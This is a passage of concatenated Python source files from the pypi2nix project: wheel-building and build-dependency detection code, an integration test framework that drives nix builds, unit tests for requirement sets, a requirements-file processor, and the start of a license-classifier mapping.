self.detect_additional_build_dependencies(requirements)\n updated_requirements = detected_requirements + requirements\n self.logger.info(\"Build wheels of setup and runtime requirements\")\n self.pip.build_wheels(\n updated_requirements, self._wheel_directory, [self._download_directory],\n )\n return self.extract_wheels()\n\n def detect_additional_build_dependencies(\n self, requirements: RequirementSet, constraints: Optional[RequirementSet] = None\n ) -> RequirementSet:\n if constraints is None:\n constraints = RequirementSet(self.target_platform)\n self.pip.download_sources(\n requirements + constraints.to_constraints_only(), self._download_directory,\n )\n uninspected_distributions = self.get_uninspected_source_distributions()\n self.register_all_source_distributions()\n detected_dependencies = RequirementSet(self.target_platform)\n if not uninspected_distributions:\n return detected_dependencies\n for distribution in uninspected_distributions:\n detected_dependencies += self._get_build_dependencies_for_distribution(\n distribution\n )\n return detected_dependencies + 
self.detect_additional_build_dependencies(\n detected_dependencies,\n constraints=(requirements + constraints).to_constraints_only(),\n )\n\n def _get_build_dependencies_for_distribution(\n self, distribution: SourceDistribution\n ) -> RequirementSet:\n self.source_distributions[distribution.name] = distribution\n build_dependencies = distribution.build_dependencies(\n self.target_platform\n ).filter(lambda requirement: requirement.name() not in [distribution.name])\n for dependency in build_dependencies:\n self._dependency_graph.set_buildtime_dependency(\n dependent=distribution.to_loose_requirement(), dependency=dependency\n )\n return build_dependencies\n\n def get_uninspected_source_distributions(self) -> List[SourceDistribution]:\n archives = [\n Archive(path=str(path))\n for path in self._download_directory.list_files()\n if path not in self.inspected_source_distribution_files\n ]\n distributions = list()\n for archive in archives:\n try:\n distribution = SourceDistribution.from_archive(\n archive, self.logger, requirement_parser=self.requirement_parser\n )\n except DistributionNotDetected:\n continue\n distributions.append(distribution)\n return distributions\n\n def register_all_source_distributions(self) -> None:\n for path in self._download_directory.list_files():\n self.inspected_source_distribution_files.add(path)\n\n def extract_wheels(self) -> List[str]:\n self.ensure_extracted_wheels_directory_exists()\n\n wheels = [\n str(file_path)\n for file_path in self._wheel_directory.list_files()\n if file_path.is_file() and str(file_path).endswith(\".whl\")\n ]\n for wheel in wheels:\n zip_file = zipfile.ZipFile(wheel)\n try:\n zip_file.extractall(str(self._extracted_wheels_directory))\n finally:\n zip_file.close()\n\n return [\n str(dist_info)\n for dist_info in self._extracted_wheels_directory.list_files()\n if str(dist_info).endswith(\".dist-info\")\n ]\n\n def get_frozen_requirements(self) -> str:\n return self.pip.freeze(python_path=[self._extracted_wheels_directory])\n\n def ensure_download_directory_exists(self) -> None:\n self._download_directory.ensure_directory()\n\n def ensure_extracted_wheels_directory_exists(self) -> None:\n self._extracted_wheels_directory.ensure_directory()\n\n def _ensure_wheels_directory_exists(self) -> None:\n self._wheel_directory.ensure_directory()\n\n @property\n def dependency_graph(self) -> DependencyGraph:\n return copy(self._dependency_graph)\n" }, { "alpha_fraction": 0.6030107140541077, "alphanum_fraction": 0.6047559976577759, "avg_line_length": 35.669334411621094, "blob_id": "9d22875600a36ec5f1537efca8d8ac26422ac391", "content_id": "364fb83589887cd581d7e56bb1c3723644aa0ff9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13751, "license_type": "no_license", "max_line_length": 86, "num_lines": 375, "path": "/integrationtests/framework.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport shutil\nimport subprocess\nimport sys\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom unittest import TestCase\n\nimport yaml\nfrom attr import attrib\nfrom attr import attrs\nfrom attr import evolve\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.requirement_parser import RequirementParser\n\nHERE = os.path.dirname(__file__)\n\n\nclass 
IntegrationTest(TestCase):\n \"\"\"Methods to implement for a valid test case:\n\n name_of_testcase\n requirements\n\n optional:\n\n setup_requires() -- default: []\n executables_for_testing() -- default: []\n extra_environment() -- default: dict()\n external_dependencies\n requirements_file_check(content) -- default: (lambda content: None)\n constraints\n code_for_testing\n python_version\n code_for_testing_filename\n explicit_build_directory\n dependencyGraph -- default {}: yaml that will be used as input for pypi2nix\n\n check_dependency_graph(\n self,\n dependency_graph: DependencyGraph,\n requirement_parser: RequirementParser\n ):\n Override this function in your test case to perform checks on the\n dependency graph information that pypi2nix renders. You can use\n the requirement_parser supplied though the method argument to\n generate Requirement objects. For example::\n django = requirement_parser.parse('django')\n pytz = requirement_parser.parse('pytz')\n\n If we wanted to check that pypi2nix detected the dependency of django\n on the pytz package than we could do it the following way:\n self.assertTrue(\n dependency_graph.is_runtime_dependency(\n dependent=django,\n dependency=pytz,\n )\n )\n \"\"\"\n\n def setUp(self) -> None:\n self.logger = StreamLogger(output=sys.stdout)\n self.nix = Nix(logger=self.logger)\n self.assertNotEqual(self.name_of_testcase, \"undefined\")\n self.requirement_parser = RequirementParser(self.logger)\n\n def test_build_example(self) -> None:\n self.build_pypi2nix()\n self.generate_requirements_file()\n self.build_nix_expression()\n self.check_requirements_file_content()\n self.run_expression_tests()\n self.run_dependency_graph_tests()\n\n def build_pypi2nix(self) -> None:\n print(\"Build pypi2nix executable\")\n try:\n self.nix.build(\n os.path.join(os.path.dirname(HERE), \"default.nix\"),\n out_link=os.path.join(HERE, \"pypi2nix\"),\n )\n except EvaluationFailed:\n self.fail(\"Could not build pypi2nix executable\")\n\n def generate_requirements_file(self) -> None:\n print(\"Generate requirements.txt\")\n requirements_file_content = self.generate_requirements_file_content()\n self.write_requirements_file(requirements_file_content)\n\n def build_nix_expression(self) -> None:\n print(\"Build nix expression\")\n if self.explicit_build_directory:\n self.prepare_build_directory()\n process = subprocess.Popen(\n self.build_nix_expression_command(),\n cwd=self.example_directory(),\n env=self.nix_build_env(),\n stdin=subprocess.DEVNULL,\n )\n process.communicate()\n if process.returncode != 0:\n self.fail(\n \"Could not build nix expression for {testname}\".format(\n testname=self.name_of_testcase\n )\n )\n\n def build_nix_expression_command(self) -> List[str]:\n command = [\n os.path.join(HERE, \"pypi2nix\", \"bin\", \"pypi2nix\"),\n \"-vvv\",\n \"-V\",\n self.python_version,\n \"-r\",\n \"requirements.txt\",\n \"--default-overrides\",\n \"--dependency-graph-input\",\n self.rendered_dependency_graph(),\n \"--dependency-graph-output\",\n self._dependency_graph_output_path(),\n ]\n for requirement in self.setup_requires():\n command.append(\"-s\")\n command.append(requirement)\n for variable_name, value in self.extra_environment().items():\n command.append(\"-N\")\n command.append(\"{name}={value}\".format(name=variable_name, value=value))\n for dependency in self.external_dependencies:\n command.append(\"-E\")\n command.append(dependency)\n if self.explicit_build_directory:\n command.append(\"--build-directory\")\n command.append(self.build_directory())\n 
return command\n\n def setup_requires(self) -> List[str]:\n return []\n\n def check_requirements_file_content(self) -> None:\n requirements_file_content = self.read_requirements_file_contents()\n self.requirements_file_check(requirements_file_content)\n\n def run_expression_tests(self) -> None:\n self.build_interpreter_from_generated_expression()\n self.build_additional_attributes()\n self.run_interpreter_with_test_code()\n self.run_executable_tests()\n\n def run_dependency_graph_tests(self) -> None:\n dependency_graph = self._read_dependency_graph()\n self.check_dependency_graph(dependency_graph, self.requirement_parser)\n\n def build_interpreter_from_generated_expression(self) -> None:\n print(\"Build python interpreter from generated expression\")\n try:\n self.nix.build(\n os.path.join(self.example_directory(), \"requirements.nix\"),\n attribute=\"interpreter\",\n out_link=os.path.join(self.example_directory(), \"result\"),\n )\n except EvaluationFailed:\n self.fail(\n \"Failed to build python interpreter from nix expression generated\"\n )\n\n def build_additional_attributes(self) -> None:\n for additional_path in self.additional_paths_to_build:\n try:\n self.nix.evaluate_file(\n os.path.join(self.example_directory(), \"requirements.nix\"),\n attribute=additional_path,\n )\n except EvaluationFailed:\n self.fail(f\"Failed to build attribute path {additional_path}\")\n\n def run_interpreter_with_test_code(self) -> None:\n if self.code_for_testing_string():\n test_code = self.code_for_testing_string()\n self.run_interpreter_with_test_code_from_result(test_code)\n self.run_interpreter_with_test_code_in_nix_shell(test_code)\n\n def run_interpreter_with_test_code_from_result(self, test_code: str) -> None:\n print(\"Run generated interpreter with test code\")\n process = subprocess.Popen(\n [os.path.join(self.example_directory(), \"result\", \"bin\", \"python\")],\n stdin=subprocess.PIPE,\n )\n process.communicate(input=test_code.encode())\n if process.returncode != 0:\n self.fail(\"Executation of test code failed\")\n\n def run_interpreter_with_test_code_in_nix_shell(self, test_code: str) -> None:\n print(\"Execute test code in nix-shell\")\n test_command_line = [\n \"nix\",\n \"run\",\n \"--show-trace\",\n \"-f\",\n os.path.join(self.example_directory(), \"requirements.nix\"),\n \"interpreter\",\n \"--command\",\n \"python\",\n ]\n process = subprocess.Popen(\n test_command_line,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=self.nix_build_env(),\n stdin=subprocess.PIPE,\n )\n process.communicate(input=test_code.encode())\n if process.returncode != 0:\n self.fail(\"Executation of test code in nix-shell failed\")\n\n def read_requirements_file_contents(self) -> str:\n with open(os.path.join(self.example_directory(), \"requirements.nix\")) as f:\n return f.read()\n\n def code_for_testing_string(self) -> str:\n if self.code_for_testing and self.code_for_testing_filename:\n self.fail(\n \"Cannot set `both code_for_testing` and `code_for_testing_filename`.\"\n )\n if self.code_for_testing:\n return \"\\n\".join(self.code_for_testing)\n elif self.code_for_testing_filename:\n with open(\n os.path.join(self.example_directory(), self.code_for_testing_filename)\n ) as f:\n return f.read()\n else:\n return \"\"\n\n code_for_testing: List[str] = []\n code_for_testing_filename: Optional[str] = None\n\n def extra_environment(self) -> Dict[str, str]:\n return dict()\n\n def run_executable_tests(self) -> None:\n for test_command in self.executables_for_testing():\n 
self.run_test_command_in_shell(test_command)\n self.run_test_command_from_build_output(test_command)\n\n def run_test_command_in_shell(self, test_command: \"TestCommand\") -> None:\n print(\"Run {command} in nix-shell\".format(command=test_command))\n test_command_line = [\n \"nix\",\n \"run\",\n \"--show-trace\",\n \"-f\",\n os.path.join(self.example_directory(), \"requirements.nix\"),\n \"interpreter\",\n \"--command\",\n ] + test_command.command\n process = subprocess.Popen(\n test_command_line,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=dict(self.nix_build_env(), **test_command.env),\n )\n process.communicate()\n print() # for empty line after command output\n if process.returncode != 0:\n self.fail(\n \"Tested executable `{command}` returned non-zero exitcode.\".format(\n command=test_command\n )\n )\n\n def run_test_command_from_build_output(self, test_command: \"TestCommand\") -> None:\n prepared_test_command = evolve(\n test_command,\n command=[\"./\" + test_command.command[0]] + test_command.command[1:],\n )\n print(\"Run {command}\".format(command=prepared_test_command))\n process = subprocess.Popen(\n prepared_test_command.command,\n cwd=os.path.join(self.example_directory(), \"result\", \"bin\"),\n env=dict(self.nix_build_env(), **prepared_test_command.env),\n )\n process.communicate()\n print() # for empty line after command output\n if process.returncode != 0:\n self.fail(\n \"Tested executable `{command}` returned non-zero exitcode.\".format(\n command=test_command\n )\n )\n\n def executables_for_testing(self) -> List[\"TestCommand\"]:\n return []\n\n def nix_build_env(self) -> Dict[str, str]:\n environment_variables = dict(os.environ)\n del environment_variables[\"PYTHONPATH\"]\n return environment_variables\n\n def generate_requirements_file_content(self) -> str:\n if self.constraints:\n self.generate_constraints_txt()\n requirements_txt_extra_content = [\"-c \" + self.constraints_txt_path()]\n else:\n requirements_txt_extra_content = []\n return \"\\n\".join(self.requirements + requirements_txt_extra_content)\n\n def generate_constraints_txt(self) -> None:\n with open(self.constraints_txt_path(), \"w\") as f:\n f.write(\"\\n\".join(self.constraints))\n\n def constraints_txt_path(self) -> str:\n return os.path.join(self.example_directory(), \"constraints.txt\")\n\n def write_requirements_file(self, content: str) -> None:\n os.makedirs(os.path.dirname(self.requirements_file_path()), exist_ok=True)\n with open(self.requirements_file_path(), \"w\") as f:\n f.write(content)\n\n def requirements_file_path(self) -> str:\n return os.path.join(self.example_directory(), \"requirements.txt\")\n\n def example_directory(self) -> str:\n return os.path.join(HERE, self.name_of_testcase)\n\n def requirements_file_check(self, _: str) -> None:\n pass\n\n def _dependency_graph_output_path(self) -> str:\n return os.path.join(self.example_directory(), \"dependency-graph.yml\")\n\n def build_directory(self):\n return os.path.join(self.example_directory(), \"build\")\n\n def prepare_build_directory(self):\n if os.path.exists(self.build_directory()):\n shutil.rmtree(self.build_directory())\n os.makedirs(self.build_directory())\n\n def check_dependency_graph(\n self, dependency_graph: DependencyGraph, requirement_parser: RequirementParser\n ):\n pass\n\n def _read_dependency_graph(self) -> DependencyGraph:\n with open(self._dependency_graph_output_path()) as f:\n return DependencyGraph.deserialize(f.read())\n\n constraints: List[str] = []\n python_version: str = 
\"python3\"\n requirements: List[str] = []\n name_of_testcase: str = \"undefined\"\n external_dependencies: List[str] = []\n explicit_build_directory: bool = False\n additional_paths_to_build: List[str] = []\n dependency_graph: Dict[str, Dict[str, List[str]]] = {}\n\n @memoize\n def rendered_dependency_graph(self) -> str:\n path = os.path.join(self.example_directory(), \"dependency-input.yml\")\n with open(path, \"w\") as f:\n yaml.dump(\n self.dependency_graph, f,\n )\n return path\n\n\n@attrs\nclass TestCommand:\n command: List[str] = attrib()\n env: Dict[str, str] = attrib(default=dict())\n" }, { "alpha_fraction": 0.7217556834220886, "alphanum_fraction": 0.7269062995910645, "avg_line_length": 33.88671875, "blob_id": "6e7cc00e5fd900d831bda79e37aeb47a490232a0", "content_id": "418eafd43fc3032cbfa3a378d13c6365798d8514", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8931, "license_type": "permissive", "max_line_length": 88, "num_lines": 256, "path": "/unittests/test_requirement_set.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture\ndef requirement_set(current_platform):\n return RequirementSet(current_platform)\n\n\ndef test_length_of_empty_requirement_set_is_0(current_platform):\n assert len(RequirementSet(current_platform)) == 0\n\n\ndef test_length_is_one_after_adding_one_requirement(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n assert len(requirement_set) == 1\n\n\ndef test_length_is_one_after_adding_same_requirement_twice(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n requirement_set.add(requirement_parser.parse(\"pypi2nix\"))\n assert len(requirement_set) == 1\n\n\ndef test_to_file_outputs_a_requirements_file_object(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n assert isinstance(\n RequirementSet(current_platform).to_file(\n project_dir, current_platform, requirement_parser, logger\n ),\n RequirementsFile,\n )\n\n\ndef test_sources_contains_a_source_per_git_requirement(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"no-git-source\"))\n requirement_set.add(\n requirement_parser.parse(\"git+https://url.test/path#egg=test-egg\")\n )\n assert len(requirement_set.sources()) == 1\n\n\ndef test_versions_add_if_same_requirement_is_added_twice(\n current_platform, requirement_parser\n):\n requirement_set = RequirementSet(current_platform)\n requirement_set.add(requirement_parser.parse(\"pypi2nix <= 2.0\"))\n requirement_set.add(requirement_parser.parse(\"pypi2nix >= 1.9\"))\n requirement = requirement_set.requirements[\"pypi2nix\"]\n assert isinstance(requirement, VersionRequirement)\n assert len(requirement.version()) == 2\n\n\ndef test_from_file_handles_empty_lines(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_file = 
RequirementsFile.from_lines(\n [\"pypi2nix\", \"\"], project_dir, requirement_parser, logger\n )\n requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n assert len(requirements_set) == 1\n\n\ndef test_from_file_handles_comment_lines(\n project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_file = RequirementsFile.from_lines(\n [\"pypi2nix\", \"# comment\"], project_dir, requirement_parser, logger\n )\n requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n assert len(requirements_set) == 1\n\n\ndef test_sources_has_sources_type(current_platform):\n requirement_set = RequirementSet(current_platform)\n assert isinstance(requirement_set.sources(), Sources)\n\n\ndef test_adding_two_empty_sets_results_in_an_empty_set(current_platform):\n requirements = RequirementSet(current_platform) + RequirementSet(current_platform)\n assert len(requirements) == 0\n\n\ndef test_can_find_requirement_in_requirement_set(current_platform, requirement_parser):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"pypi2nix\"))\n assert \"pypi2nix\" in requirements\n\n\ndef test_cannot_find_name_in_empty_requirement_set(current_platform):\n assert \"test\" not in RequirementSet(current_platform)\n\n\ndef test_elements_from_both_sets_can_be_found_in_sum_of_sets(\n current_platform, requirement_parser\n):\n left = RequirementSet(current_platform)\n left.add(requirement_parser.parse(\"test1\"))\n right = RequirementSet(current_platform)\n right.add(requirement_parser.parse(\"test2\"))\n sum = left + right\n assert \"test1\" in sum\n assert \"test2\" in sum\n\n\ndef test_requirement_set_respects_constraints_when_reading_from_requirement_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n constraints_txt = tmpdir.join(\"constraints.txt\")\n with open(requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n print(\"-c \" + str(constraints_txt), file=f)\n with open(constraints_txt, \"w\") as f:\n print(\"test-requirement <= 1.0\", file=f)\n\n original_requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n original_requirements_file.process()\n\n requirement_set = RequirementSet.from_file(\n original_requirements_file, current_platform, requirement_parser, logger\n )\n\n new_requirements_file = requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n\n assert \"test-requirement <= 1.0\" in new_requirements_file.read()\n\n\ndef test_constraints_without_requirement_will_not_show_up_in_generated_requirement_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n constraints_txt = tmpdir.join(\"constraints.txt\")\n\n with open(requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n print(\"-c \" + str(constraints_txt), file=f)\n with open(constraints_txt, \"w\") as f:\n print(\"test-constraint == 1.0\", file=f)\n\n original_requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n original_requirements_file.process()\n\n requirement_set = RequirementSet.from_file(\n original_requirements_file, current_platform, requirement_parser, logger\n )\n\n new_requirements_file = 
requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n\n assert \"test-constraint\" not in new_requirements_file.read()\n\n\ndef test_include_lines_are_respected_when_generating_from_file(\n tmpdir, project_dir, current_platform, requirement_parser, logger: Logger\n):\n requirements_txt = tmpdir.join(\"requirements.txt\")\n included_requirements_txt = tmpdir.join(\"included_requirements.txt\")\n\n with open(requirements_txt, \"w\") as f:\n print(\"-r \" + str(included_requirements_txt), file=f)\n with open(included_requirements_txt, \"w\") as f:\n print(\"test-requirement\", file=f)\n requirements_file = RequirementsFile(\n str(requirements_txt), project_dir, requirement_parser, logger\n )\n requirements_file.process()\n requirement_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n\n assert \"test-requirement\" in requirement_set\n\n\ndef test_that_we_can_query_for_added_requirements(requirement_set, requirement_parser):\n requirement = requirement_parser.parse(\"pytest\")\n requirement_set.add(requirement)\n assert requirement_set[requirement.name()] == requirement\n\n\ndef test_that_querying_for_non_existing_requirement_raises_key_error(requirement_set):\n with pytest.raises(KeyError):\n requirement_set[\"non-existing\"]\n\n\ndef test_that_queries_into_set_are_canonicalized(requirement_set, requirement_parser):\n requirement = requirement_parser.parse(\"pytest\")\n requirement_set.add(requirement)\n assert requirement_set[\"PyTest\"] == requirement\n\n\ndef test_that_get_method_returns_none_if_key_not_found(requirement_set):\n assert requirement_set.get(\"not-found\") is None\n\n\ndef test_that_get_method_returns_specified_default_value_when_not_found(\n requirement_set,\n):\n assert requirement_set.get(\"not-found\", 0) == 0\n\n\ndef test_that_filter_works_by_name(requirement_parser, requirement_set):\n requirement = requirement_parser.parse(\"test\")\n requirement_set.add(requirement)\n\n assert len(requirement_set) == 1\n\n filtered_requirement_set = requirement_set.filter(lambda req: req.name() != \"test\")\n\n assert len(filtered_requirement_set) == 0\n\n\ndef test_that_extras_are_preserved_when_converting_to_and_from_a_file(\n requirement_parser: RequirementParser,\n requirement_set: RequirementSet,\n current_platform: TargetPlatform,\n project_dir: str,\n logger: Logger,\n):\n requirement_set.add(requirement_parser.parse(\"req[extra1]\"))\n requirements_file = requirement_set.to_file(\n project_dir, current_platform, requirement_parser, logger\n )\n new_requirements_set = RequirementSet.from_file(\n requirements_file, current_platform, requirement_parser, logger\n )\n requirement = new_requirements_set[\"req\"]\n assert requirement.extras() == {\"extra1\"}\n" }, { "alpha_fraction": 0.5997419357299805, "alphanum_fraction": 0.6011613011360168, "avg_line_length": 34.227272033691406, "blob_id": "94e08008ecb9f551c6415f391aae0cfe1087cb20", "content_id": "42bdaa68a160f2a968f4a9b35fd734635dfe2eed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7750, "license_type": "no_license", "max_line_length": 87, "num_lines": 220, "path": "/src/pypi2nix/requirements_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import hashlib\nimport os\nimport os.path\nimport tempfile\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Type\nfrom typing import Union\n\nfrom pypi2nix.logger import Logger\nfrom 
pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.sources import Sources\n\nLineHandler = Union[\n \"_RequirementIncludeLineHandler\", \"_EditableLineHandler\", \"_RequirementLineHandler\"\n]\n\n\nclass RequirementsFile:\n def __init__(\n self,\n path: str,\n project_dir: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ):\n self.project_dir: str = project_dir\n self.original_path: str = path\n self.requirement_parser = requirement_parser\n self._logger = logger\n self._sources = Sources()\n\n @classmethod\n def from_lines(\n constructor: \"Type[RequirementsFile]\",\n lines: List[str],\n project_dir: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementsFile\":\n assert not isinstance(lines, str)\n temporary_file_descriptor, temporary_file_path = tempfile.mkstemp(\n dir=project_dir, text=True\n )\n try:\n with open(temporary_file_descriptor, \"w\") as f:\n for line in lines:\n f.write(line)\n f.write(\"\\n\")\n requirements_file = constructor(\n project_dir=project_dir,\n path=temporary_file_path,\n requirement_parser=requirement_parser,\n logger=logger,\n )\n requirements_file.process()\n finally:\n os.remove(temporary_file_path)\n return requirements_file\n\n def read(self) -> str:\n if os.path.exists(self.processed_requirements_file_path()):\n path = self.processed_requirements_file_path()\n else:\n path = self.original_path\n with open(path) as f:\n return f.read()\n\n def process(self) -> None:\n new_requirements_file = self.processed_requirements_file_path()\n\n with open(self.original_path) as original_file, open(\n new_requirements_file, \"w+\"\n ) as new_file:\n for requirements_line in original_file.readlines():\n requirements_line = requirements_line.strip()\n if requirements_line:\n processed_requirements_line = self._process_line(requirements_line)\n print(processed_requirements_line, file=new_file)\n self._logger.debug(f\"Created requirements file {new_requirements_file}\")\n\n def _process_line(self, requirements_line: str) -> str:\n line_handler: LineHandler\n if self.is_include_line(requirements_line):\n line_handler = _RequirementIncludeLineHandler(\n line=requirements_line,\n original_path=self.original_path,\n project_directory=self.project_dir,\n requirement_parser=self.requirement_parser,\n logger=self._logger,\n )\n elif self.is_editable_line(requirements_line):\n line_handler = _EditableLineHandler(\n line=requirements_line,\n original_path=self.original_path,\n requirement_parser=self.requirement_parser,\n )\n else:\n line_handler = _RequirementLineHandler(\n line=requirements_line,\n requirement_parser=self.requirement_parser,\n original_path=self.original_path,\n )\n line, sources = line_handler.process()\n self._sources.update(sources)\n return line\n\n def processed_requirements_file_path(self) -> str:\n return \"%s/%s.txt\" % (\n self.project_dir,\n hashlib.md5(self.original_path.encode()).hexdigest(),\n )\n\n def is_include_line(self, line: str) -> bool:\n return line.startswith(\"-r \") or line.startswith(\"-c \")\n\n def is_vcs_line(self, line: str) -> bool:\n return line.startswith(\"-e git+\") or line.startswith(\"-e hg+\")\n\n def is_editable_line(self, line: str) -> bool:\n return line.startswith(\"-e \") and not self.is_vcs_line(line)\n\n def sources(self) -> Sources:\n return self._sources\n\n\nclass _RequirementIncludeLineHandler:\n 
def __init__(\n self,\n line: str,\n original_path: str,\n project_directory: str,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> None:\n self._line = line\n self._original_path = original_path\n self._project_directory = project_directory\n self._requirement_parser = requirement_parser\n self._logger = logger\n\n def process(self) -> Tuple[str, Sources]:\n # this includes '-r ' and '-c ' lines\n original_file_path = self._line[2:].strip()\n if os.path.isabs(original_file_path):\n included_file_path = original_file_path\n else:\n included_file_path = os.path.abspath(\n os.path.join(os.path.dirname(self._original_path), original_file_path)\n )\n new_requirements_file = RequirementsFile(\n included_file_path,\n self._project_directory,\n requirement_parser=self._requirement_parser,\n logger=self._logger,\n )\n new_requirements_file.process()\n return (\n self._line[0:3] + new_requirements_file.processed_requirements_file_path(),\n new_requirements_file.sources(),\n )\n\n\nclass _EditableLineHandler:\n def __init__(\n self, line: str, original_path: str, requirement_parser: RequirementParser\n ) -> None:\n self._line = line\n self._original_path = original_path\n self._requirement_parser = requirement_parser\n\n def process(self) -> Tuple[str, Sources]:\n self._strip_editable()\n line_handler = _RequirementLineHandler(\n line=self._line,\n requirement_parser=self._requirement_parser,\n original_path=self._original_path,\n )\n line, sources = line_handler.process()\n return \"-e \" + line, sources\n\n def _strip_editable(self) -> None:\n self._line = self._line[2:].strip()\n\n\nclass _RequirementLineHandler:\n def __init__(\n self, line: str, requirement_parser: RequirementParser, original_path: str\n ) -> None:\n self._line = line\n self._requirement_parser = requirement_parser\n self._original_path = original_path\n self._sources = Sources()\n\n def process(self) -> Tuple[str, Sources]:\n try:\n requirement = self._requirement_parser.parse(self._line)\n except ParsingFailed:\n return self._line, self._sources\n else:\n if isinstance(requirement, PathRequirement):\n requirement = requirement.change_path(\n lambda path: self._update_path(requirement.name(), path)\n )\n return requirement.to_line(), self._sources\n\n def _update_path(self, requirement_name: str, requirement_path: str) -> str:\n if not os.path.isabs(requirement_path):\n requirement_path = os.path.relpath(\n os.path.join(os.path.dirname(self._original_path), requirement_path)\n )\n self._sources.add(requirement_name, PathSource(path=requirement_path))\n if os.path.isabs(requirement_path):\n return requirement_path\n else:\n absolute_path = os.path.abspath(requirement_path)\n return absolute_path\n" }, { "alpha_fraction": 0.6144532561302185, "alphanum_fraction": 0.6303443312644958, "avg_line_length": 46.19643020629883, "blob_id": "55215b74333a38ff321b9c0d4aada053feae2657", "content_id": "4d1902ba515ad93264103023496ea031b2aff485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7929, "license_type": "no_license", "max_line_length": 111, "num_lines": 168, "path": "/src/pypi2nix/license.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import re\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nfrom pypi2nix.nix_language import escape_string\n\nall_classifiers = {\n \"License :: Aladdin Free Public License (AFPL)\": None,\n \"License :: CC0 1.0 Universal (CC0 1.0) Public Domain Dedication\": None,\n 
\"License :: DFSG approved\": None,\n \"License :: Eiffel Forum License (EFL)\": None,\n \"License :: Free For Educational Use\": None,\n \"License :: Free For Home Use\": None,\n \"License :: Free for non-commercial use\": None,\n \"License :: Freely Distributable\": None,\n \"License :: Free To Use But Restricted\": None,\n \"License :: Freeware\": None,\n \"License :: Netscape Public License (NPL)\": None,\n \"License :: Nokia Open Source License (NOKOS)\": None,\n \"License :: OSI Approved\": None,\n \"License :: OSI Approved :: Academic Free License (AFL)\": \"licenses.afl21\",\n \"License :: OSI Approved :: Apache Software License\": \"licenses.asl20\",\n \"License :: OSI Approved :: Apple Public Source License\": None,\n \"License :: OSI Approved :: Artistic License\": \"licenses.artistic2\",\n \"License :: OSI Approved :: Attribution Assurance License\": None,\n \"License :: OSI Approved :: BSD License\": \"licenses.bsdOriginal\",\n \"License :: OSI Approved :: CEA CNRS Inria Logiciel Libre License, version 2.1 (CeCILL-2.1)\": None,\n \"License :: OSI Approved :: Common Public License\": \"licenses.cpl10\",\n \"License :: OSI Approved :: Eiffel Forum License\": \"licenses.efl20\",\n \"License :: OSI Approved :: European Union Public Licence 1.0 (EUPL 1.0)\": None,\n \"License :: OSI Approved :: European Union Public Licence 1.1 (EUPL 1.1)\": None,\n \"License :: OSI Approved :: GNU Affero General Public License v3\": \"licenses.agpl3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)\": \"licenses.agpl3Plus\",\n \"License :: OSI Approved :: GNU Free Documentation License (FDL)\": \"licenses.fdl13\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\": \"licenses.gpl1\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\": \"licenses.gpl2\",\n \"License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)\": \"licenses.gpl2Plus\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\": \"licenses.gpl3\",\n \"License :: OSI Approved :: GNU General Public License v3 or later 